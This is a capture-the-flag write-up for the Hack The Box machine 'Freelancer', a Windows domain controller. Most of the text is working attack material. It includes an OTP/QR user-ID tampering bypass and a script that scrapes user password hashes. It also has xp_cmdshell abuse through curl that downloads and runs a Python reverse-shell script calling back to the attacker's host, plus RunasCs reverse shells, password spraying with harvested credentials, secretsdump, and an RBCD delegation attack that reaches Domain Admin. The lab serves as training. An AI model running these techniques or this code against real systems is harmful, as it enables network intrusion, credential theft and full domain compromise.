Owned Freelancer from Hack The Box!
I have just owned machine Freelancer from Hack The Box
Nmap Results
# Nmap 7.94SVN scan initiated Tue Jun 4 01:43:54 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.10.11.5
Nmap scan report for 10.10.11.5
Host is up (0.011s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-04 10:45:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
57551/tcp open msrpc Microsoft Windows RPC
57555/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-06-04T10:45:54
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 4 01:46:34 2024 -- 1 IP address (1 host up) scanned in 160.12 secondsLooking at the ports running on the machine, this is looking like a Windows Domain Controller, so we'll also be employing the typical Active Directory enumeration playbook.
We can see the redirect to http://freelancer.htb in the tcp/80 output, so let's go ahead and get that added to our /etc/hosts file.
echo -e '10.10.11.5\tfreelancer.htb' | sudo tee -a /etc/hosts
Service Enumeration
TCP/53
TCP/389
TCP/445
ℹ️
Since anonymous SMB login was successful, I tried RID cycling using both
crackmapexec and enum4linux, but neither were able to run with anonymous login against the target.TCP/88
ℹ️
As mentioned previously, we can tell this is a Windows domain controller by looking at the ports open on the target. So, we'll use the Active Directory enumeration playbook as well, and do some Kerberos pre-auth enumeration.
Kerberos Pre-Auth User... | 0xBEN | Notes
How it Works
We can send a request for a TGT --- without a pre-authentication hash --- to the Kerbe…
kerbrute userenum -d freelancer.htb --dc freelancer.htb -t 100 -o kerbrute.log ./kerberos_users.txt2024/06/04 02:00:10 > Using KDC(s):
2024/06/04 02:00:10 > 10.10.11.5:88
2024/06/04 02:01:27 > [+] VALID USERNAME: administrator@freelancer.htb
2024/06/04 02:09:19 > [+] VALID USERNAME: dc2@freelancer.htb
2024/06/04 02:10:16 > [+] VALID USERNAME: d.jones@freelancer.htb
2024/06/04 02:11:00 > [+] VALID USERNAME: dthomas@freelancer.htb
2024/06/04 02:12:05 > [+] VALID USERNAME: ereed@freelancer.htb
2024/06/04 02:15:59 > [+] VALID USERNAME: hking@freelancer.htb
2024/06/04 02:18:17 > [+] VALID USERNAME: jgreen@freelancer.htb
2024/06/04 02:18:33 > [+] VALID USERNAME: jmartinez@freelancer.htb
2024/06/04 02:24:42 > [+] VALID USERNAME: michael.williams@freelancer.htb
2024/06/04 02:27:31 > [+] VALID USERNAME: olivia.garcia@freelancer.htb
2024/06/04 02:31:38 > [+] VALID USERNAME: sdavis@freelancer.htb
2024/06/04 02:33:25 > [+] VALID USERNAME: sshd@freelancer.htb
2024/06/04 02:34:28 > [+] VALID USERNAME: taylor@freelancer.htb
2024/06/04 02:37:28 > [+] VALID USERNAME: wwalker@freelancer.htb
2024/06/04 02:38:14 > Done! Tested 8106127 usernames (14 valid) in 2283.182 secondsℹ️
With this list of users handy, now would be a good time to see if any of them have pre-authentication disabled on their AD accounts
grep '@' kerbrute.log | awk -v FS=' ' '{print $7}' | cut -d '@' -f 1 > asrep.txtimpacket-GetNPUsers -usersfile asrep.txt -no-pass -dc-ip 10.10.11.5 freelancer.htb/
TCP/80
Gobuster Enumeration
Directories and Files
gobuster dir -u http://freelancer.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 25 --delay 100ms -o freelancer.txt/about (Status: 301) [Size: 0] [--> /about/]
/admin (Status: 301) [Size: 0] [--> /admin/]
/blog (Status: 301) [Size: 0] [--> /blog/]
/contact (Status: 301) [Size: 0] [--> /contact/]ℹ️
I tried enumerating virtual hosts on the target as well, but there was some obvious rate-limiting and I stopped the scan halfway, since it seemed like that was not going to be fruitful
Employer Account Verification Bypass
ℹ️
Up until this point, I had been trying lots of different payloads in different input points, but there appears to be a WAF reviewing and sanitizing inputs. So, I shelved that strategy and decided to look at different bypass methods.
✅
I've actually seen this on production websites. Not necessarily account activation, but you create an account and you can't login, so you use the password reset function and then it works.
Exploring the Employer Portal
The QR-Code menu in the left-pane is quite interesting, as the verbiage states:
Use your mobile phone to scan this QR-Code to login to your account without using any type of credentials. Please note that this QR-Code is valid for 5 Minutes only.
Logging in without using any type of credentials? Very interesting.
10012Finding the Admin User ID
If you go back to the home screen, you'll note the section about a quarter way down that shows the featured freelancers.
ℹ️
If you hover over the More Info button, you'll notice the URL follows a pattern of
http://freelancer.htb/accounts/profile/visit/ followed by the user IDIf we try chaining the user ID portion of the URL, we may be able to find the admin user. Usually the admin user has a very low ID number.
http://freelancer.htb/accounts/profile/visit/1/=HTTP 404http://freelancer.htb/accounts/profile/visit/2/= Admin
Alter the QR Code and Become Admin
echo '2' | basenc --base64url
Let's see what happens if we alter the URL embedded in the QR code and swap our user ID with the admin user's base64-encded user ID.
http://freelancer.htb/accounts/login/otp/Mgo=/75ef5b77fdb67b1f69f1141936623018/- Open an incognito window or different browser
- Paste the URL into the address bar and navigate to the page
- You should now be admin
ℹ️
Upon logging in with the QR code, we also now possess a CSRF token to do things as the
admin user
admin CSRF token, we can now log into the /admin pageExploring the Freelancer Admin Portal
Exporting the User Data
ℹ️
The user's password and security questions are hashed, but we should be able to grab these and archive them for cracking and future reference
mkdir userdataCreate a directory to store the user data
# Store the base url and cookie data in a variable
BASE_URL='http://freelancer.htb'
SESSION='Cookie: csrftoken=MynpPuocQK7WdNf6bPZtKbqpCbcL9rmD; sessionid=fw0yjcnrv7ia96ikpnjdmirj7ex1e1hq'
# Fetch all of the user urls and store them in an array
user_paths=( $(curl -s -H $SESSION "${BASE_URL}/admin/freelancer/customuser/" | grep -o '\/admin\/freelancer\/customuser\/.*\/change') )
# For loop over each user URL
for user_path in $user_paths ; do \
# Store a full URL in a variable for parsing
user_url="${BASE_URL}${user_path}" ; \
# Filter out the user ID using string manipulation
user_id=$(echo $user_url | rev | cut -d '/' -f 2 | rev) ; \
# Grab the user data from the URL and save it in a file
# Use `grep`, `cut`, and `tr` to parse out the values
curl -s -H $SESSION "${BASE_URL}${user_path}/"| tr '>', '\n' | grep input | grep -E 'name="username|email|password"' | cut -d ' ' -f 4 | tr -d '"' | cut -d '=' -f 2 > "./userdata/${user_id}.txt" ; \
doneUse curl and my session cookie to grep all user URLs
Exploring the SQL Terminal
1433 - Pentesting MSSQL - Microsoft SQL Server | HackTricks | HackTricks
MSSQL AD Abuse | HackTricks | HackTricks
ℹ️
Working my way down the HackTricks page, I found that I can impersonate the
sa (system admin) user
Getting Command Execution via SQL
sysadmin
xp_cmdshell
sudo impacket-smbserver -smb2support evil .Start a SMB server and see if we can capture a NTLM hash
sql_svc account⚠️
Unfortunately, this hash did not crack with
rockyou.txt, but I'll keep it handy just in caseExploit
Optimizing the XP_CMDSHELL Calls
ℹ️
You'll notice eventually that the
xp_cmdshell feature does not stay enabled, likely to preserve the challenge for other users on the box. We can use the requests captured via Burp to automate issuing commands via xp_cmdshell.
💡
This server is running on top of a Python Django server, which you can infer by some of the CSRF schema used in the app
nano sh.pyChange your VPN IP and port in the script file
sh.py
import os,socket,subprocess,threading;
def s2p(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
p.stdin.flush()
def p2s(s, p):
while True:
s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",443))
p=subprocess.Popen(["powershell"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
except KeyboardInterrupt:
s.close()
sudo python3 -m http.server 80Start a Python HTTP server to host the nc.exe binary
BASE_URL='http://freelancer.htb/admin/'
SQL_URL="${BASE_URL}executeRawSql/"
# Cookie from Burp request
COOKIE='Cookie: csrftoken=EywnlO2I7ZvU2blMEmDNkXXi0ZjacTdU; sessionid=h72scfdmxdaytym4uyh1oq568fg5vupa'
# csrfmiddlewaretoken from Burp request
csrfmwt='dUUnUICi1hw14oZkl8VHNqLFF6zbhXc4HigA5muQY6RLWpaWPkokXdyNvVIbjGfO'
# Enable advanced features
curl -s -H $COOKIE $SQL_URL \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-d "query=sp_configure+'show+advanced+options'%2C+'1'%0ARECONFIGURE&csrfmiddlewaretoken=${csrfmwt}"
# Enable xp_cmdshell
curl -s -H $COOKIE $SQL_URL \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-d "query=sp_configure+'xp_cmdshell'%2C+'1'%0ARECONFIGURE&csrfmiddlewaretoken=${csrfmwt}"
# Issue xp_cmdshell command
command='powershell -nop -c "iwr http://10.10.14.6/sh.py -o C:/Windows/Tasks/sh.py"'
curl -s -H $COOKIE $SQL_URL \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-d "query=EXEC+master..xp_cmdshell+'${command}';&csrfmiddlewaretoken=${csrfmwt}"
# Issue xp_cmdshell command
command='python C:/Windows/Tasks/sh.py'
curl -s -H $COOKIE $SQL_URL \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-d "query=EXEC+master..xp_cmdshell+'${command}';&csrfmiddlewaretoken=${csrfmwt}"Download sh.exe to the target
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: DC
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA664
Original Install Date: 5/28/2024, 10:25:02 AM
System Boot Time: 6/7/2024, 12:29:29 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,224 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,872 MB
Virtual Memory: In Use: 1,927 MB
Page File Location(s): C:\pagefile.sys
Domain: freelancer.htb
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.127.251
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
================== ==============================================
freelancer\sql_svc S-1-5-21-3542429192-2036945976-3483670807-1114
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Users and Groups
Domain Users
samAccountName UserPrincipalName
-------------- -----------------
Administrator
Guest
krbtgt
mikasaAckerman mikasa.ackerman@freelancer.htb
sshd
SQLBackupOperator
sql_svc
lorra199
maya.artmes maya.artmes@freelancer.htb
michael.williams michael.williams@freelancer.htb
sdavis sdavis@freelancer.htb
d.jones d.jones@freelancer.htb
jen.brown jen.brown@freelancer.htb
taylor taylor@freelancer.htb
jmartinez jmartinez@freelancer.htb
olivia.garcia olivia.garcia@freelancer.htb
dthomas dthomas@freelancer.htb
sophia.h sophia.h@freelancer.htb
Ethan.l Ethan.l@freelancer.htb
wwalker wwalker@freelancer.htb
jgreen jgreen@freelancer.htb
evelyn.adams evelyn.adams@freelancer.htb
hking hking@freelancer.htb
alex.hill alex.hill@freelancer.htb
samuel.turner samuel.turner@freelancer.htb
ereed ereed@freelancer.htb
leon.sk leon.sk@freelancer.htb
carol.poland carol.poland@freelancer.htb
lkazanof lkazanof@freelancer.htb
Domain Groups
Administrators
--------------
CN=Domain Admins,CN=Users,DC=freelancer,DC=htb
CN=Enterprise Admins,CN=Users,DC=freelancer,DC=htb
CN=Administrator,CN=Users,DC=freelancer,DC=htb
Users
-----
CN=Domain Users,CN=Users,DC=freelancer,DC=htb
CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=freelancer,DC=htb
CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=freelancer,DC=htb
Guests
------
CN=Domain Guests,CN=Users,DC=freelancer,DC=htb
CN=Guest,CN=Users,DC=freelancer,DC=htb
Performance Monitor Users
-------------------------
CN=Daniel Thomas,CN=Users,DC=freelancer,DC=htb
CN=Maya Artmes,CN=Users,DC=freelancer,DC=htb
Performance Log Users
---------------------
CN=Daniel Thomas,CN=Users,DC=freelancer,DC=htb
Event Log Readers
-----------------
CN=Michael Williams,CN=Users,DC=freelancer,DC=htb
Remote Management Users
-----------------------
CN=Liza Kazanof,CN=Users,DC=freelancer,DC=htb
CN=William Walker,CN=Users,DC=freelancer,DC=htb
CN=Daniel Thomas,CN=Users,DC=freelancer,DC=htb
CN=Michael Williams,CN=Users,DC=freelancer,DC=htb
CN=Lorra Armessa,CN=Users,DC=freelancer,DC=htb
Schema Admins
-------------
CN=Administrator,CN=Users,DC=freelancer,DC=htb
Enterprise Admins
-----------------
CN=Administrator,CN=Users,DC=freelancer,DC=htb
Domain Admins
-------------
CN=Administrator,CN=Users,DC=freelancer,DC=htb
Group Policy Creator Owners
---------------------------
CN=Administrator,CN=Users,DC=freelancer,DC=htb
Server Operators
----------------
CN=Jessica Martinez,CN=Users,DC=freelancer,DC=htb
Account Operators
-----------------
CN=Liza Kazanof,CN=Users,DC=freelancer,DC=htb
CN=Evelyn Adams,CN=Users,DC=freelancer,DC=htb
CN=Joseph Green,CN=Users,DC=freelancer,DC=htb
CN=Jessica Martinez,CN=Users,DC=freelancer,DC=htb
Pre-Windows 2000 Compatible Access
----------------------------------
CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=freelancer,DC=htb
Incoming Forest Trust Builders
------------------------------
CN=William Walker,CN=Users,DC=freelancer,DC=htb
Windows Authorization Access Group
----------------------------------
CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=freelancer,DC=htb
Denied RODC Password Replication Group
--------------------------------------
CN=Read-only Domain Controllers,CN=Users,DC=freelancer,DC=htb
CN=Group Policy Creator Owners,CN=Users,DC=freelancer,DC=htb
CN=Domain Admins,CN=Users,DC=freelancer,DC=htb
CN=Cert Publishers,CN=Users,DC=freelancer,DC=htb
CN=Enterprise Admins,CN=Users,DC=freelancer,DC=htb
CN=Schema Admins,CN=Users,DC=freelancer,DC=htb
CN=Domain Controllers,CN=Users,DC=freelancer,DC=htb
CN=krbtgt,CN=Users,DC=freelancer,DC=htb
Cloneable Domain Controllers
----------------------------
CN=William Walker,CN=Users,DC=freelancer,DC=htb
DnsAdmins
---------
CN=Liza Kazanof,CN=Users,DC=freelancer,DC=htb
CN=Olivia Garcia,CN=Users,DC=freelancer,DC=htb
IT Technicians
--------------
CN=Carol Poland,CN=Users,DC=freelancer,DC=htb
CN=Sarah Davis,CN=Users,DC=freelancer,DC=htb
Help Desk
---------
CN=Samuel Turner,CN=Users,DC=freelancer,DC=htb
CN=Harper King,CN=Users,DC=freelancer,DC=htb
Freelancer_WebApp Developers
----------------------------
CN=Alexander Hill,CN=Users,DC=freelancer,DC=htb
CN=Ethan Lewis,CN=Users,DC=freelancer,DC=htb
CN=Jennifer Brown,CN=Users,DC=freelancer,DC=htb
CN=David Jones,CN=Users,DC=freelancer,DC=htb
AD Recycle Bin
--------------
CN=Lorra Armessa,CN=Users,DC=freelancer,DC=htb
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.190.213
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
Open Ports
LocalAddress LocalPort
------------ ---------
:: 593
:: 464
:: 445
:: 5985
:: 47001
:: 49664
:: 88
:: 52090
:: 55297
:: 49670
:: 49677
:: 52086
::1 53
0.0.0.0 49671
0.0.0.0 389
0.0.0.0 49669
0.0.0.0 80
0.0.0.0 135
0.0.0.0 49672
0.0.0.0 49667
0.0.0.0 3268
0.0.0.0 9389
0.0.0.0 3269
0.0.0.0 49665
0.0.0.0 49666
0.0.0.0 636
10.129.190.213 139
127.0.0.1 8000
Interesting Files
*conf* under C:\UsersC:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
Privilege Escalation
Password Spraying
ℹ️
During the post-exploit enumeration phase, I typically explore the file system for configuration files and other such files where a username and/or password might be stored.
The
The
.ini file found above contains some passwords that we should spray around given the usernames we've found on the system.users.txt
Administrator
Guest
krbtgt
mikasaAckerman
sshd
SQLBackupOperator
sql_svc
lorra199
maya.artmes
michael.williams
sdavis
d.jones
jen.brown
taylor
jmartinez
olivia.garcia
dthomas
sophia.h
Ethan.l
wwalker
jgreen
evelyn.adams
hking
alex.hill
samuel.turner
ereed
leon.sk
carol.poland
lkazanof
mikasaAckerman:IL0v3ErenY3agerLateral to mikasaAckerman
💡
Let's dump the LDAP records so we can have the data available
ldapdomaindump -u 'freelancer.htb\mikasaAckerman' -p 'IL0v3ErenY3ager' freelancer.htb
Releases · antonioCoco/RunasCs
RunasCs - Csharp and open version of windows builtin runas.exe - antonioCoco/RunasCs
antonioCocoWe're going to use RunasCs to spawn a process as mikasaackerman
wget https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip
unzip RunasCs.zipsudo python3 -m http.server 80Start a Python HTTP server to transfer RunasCs.exe to the target
iwr http://10.10.14.6/RunasCs.exe -o runas.exe
sudo rlwrap nc -lnvp 443Start a listener to catch the reverse shell
.\runas.exe mikasaAckerman IL0v3ErenY3ager powershell.exe -r 10.10.14.6:443Start powershell and send it through the socket
Memory Dump Analysis
mail.txt
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,
sudo impacket-smbserver -smb2support -username evil -password evil myshare .Start a SMB server to transfer the memory dump locally
net use x: /user:evil \\10.10.14.6\myshare evil
X:cp MEMORY.7z X:\
Analysis with MemProcFS
read “windows memory” dump on linux after%3A2020 -volatility - Google Search
My initial Google search for Linux tools to read Windows memory dumps
Releases · ufrisk/MemProcFS
MemProcFS. Contribute to ufrisk/MemProcFS development by creating an account on GitHub.
ufriskwget https://github.com/ufrisk/MemProcFS/releases/download/v5.9/MemProcFS_files_and_binaries_v5.9.17-linux_x64-20240603.tar.gz -O MemProcFS.tar.gz
tar -xvzf MemProcFS.tar.gz
mkdir /tmp/memdumpMake a mountpoint to host the memory dump files
./memprocfs -device MEMORY.DMP -mount /tmp/memdump &Mount the dump file and run it in the background
ℹ️
I'm running this in my Kali VM and no my Kali LXC ---
kali-ct --- due to needing the fuse kernel module
impacket-secretsdump -sam /tmp/memdump/registry/hive_files/0xffffd3067d935000-SAM-MACHINE_SAM.reghive \
-system /tmp/memdump/registry/hive_files/0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive \
-security /tmp/memdump/registry/hive_files/0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive local
nxc smb freelancer.htb -d freelancer.htb -u users.txt -p 'PWN3D#l0rr@Armessa199' --continue-on-success
lorra199:PWN3D#l0rr@Armessa199Lateral to Lorra
ldapdomaindump info from earlier, we see Lorra is in an interesting group
Bloodhound Analysis
faketime "$(ntpdate -q freelancer.htb | cut -d ' ' -f 1,2)" \
bloodhound-python -c All -u lorra199 -p 'PWN3D#l0rr@Armessa199' \
-d freelancer.htb -dc freelancer.htb -ns 10.129.190.213
sudo neo4j console &
sudo bloodhound &
Use GenericWrite to Impersonate Admin
GenericWrite | Pentesting & Red Teaming Notes
Kerberos Resource-based Constrained Delegation: Computer Object Takeover | Red Team Notes
(RBCD) Resource-based constrained | The Hacker Recipes
🚨
Be sure to add
DC.freelancer.lab to your /etc/hosts file for some of the Kerberos authentication stepsimpacket-addcomputer 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199' -dc-ip 10.129.82.36Add a computer account to the domain controller, then we'll have GenericWrite over it
impacket-rbcd -delegate-to 'DC$' -delegate-from 'DESKTOP-FKOIG016$' -dc-ip 10.129.82.36 -action write 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'Given the GenericWrite permission, we can delegate access to the DC via this computer
ℹ️
You can get the domain controller's computer name by running the
hostname command, or find it in the ldapdomaindump or bloodhound output
faketime "$(ntpdate -q freelancer.htb | cut -d ' ' -f 1,2)" \
impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate Administrator \
-dc-ip 10.129.82.36 'freelancer.htb/DESKTOP-WW2TQAGV$:2SEJRGmu5RHktEm65DyUATCrAk9kiTzp'Use S4U to delegate to the DC, impersonate the Domain Admin, and request a TGT
💡
We use the
faketime binary here, and the FQDN DC.freelancer.htb, to spoof a synchronized clock with the domain controller, since that is a requirement for Kerberos authentication
ℹ️
As noted in the output,
Saving ticket in Administrator@cifs_DC.freelancer.htb@FREELANCER.HTB.ccache, we have a ticket cached that we can use to login as the Administrator to the DCKRB5CCNAME='Administrator@cifs_DC.freelancer.htb@FREELANCER.HTB.ccache' \
faketime "$(ntpdate -q freelancer.htb | cut -d ' ' -f 1,2)" \
impacket-secretsdump -k -no-pass -dc-ip 10.129.82.36 DC.freelancer.htbℹ️
We're storing the Kerberos TGT in a command variable assignment,
KRB5CCNAME, then using faketime to sync with the clock on the DC, and finally, connecting over SMB via CIFS to dump hashes on the DC
Becoming Domain Admin
secretsdump output along with evil-winrmFlags
User
d1ee5e5d03e91167222380fbe4f8a68f
Root
06a8a39fc5dca023405cead19cc2d9cb
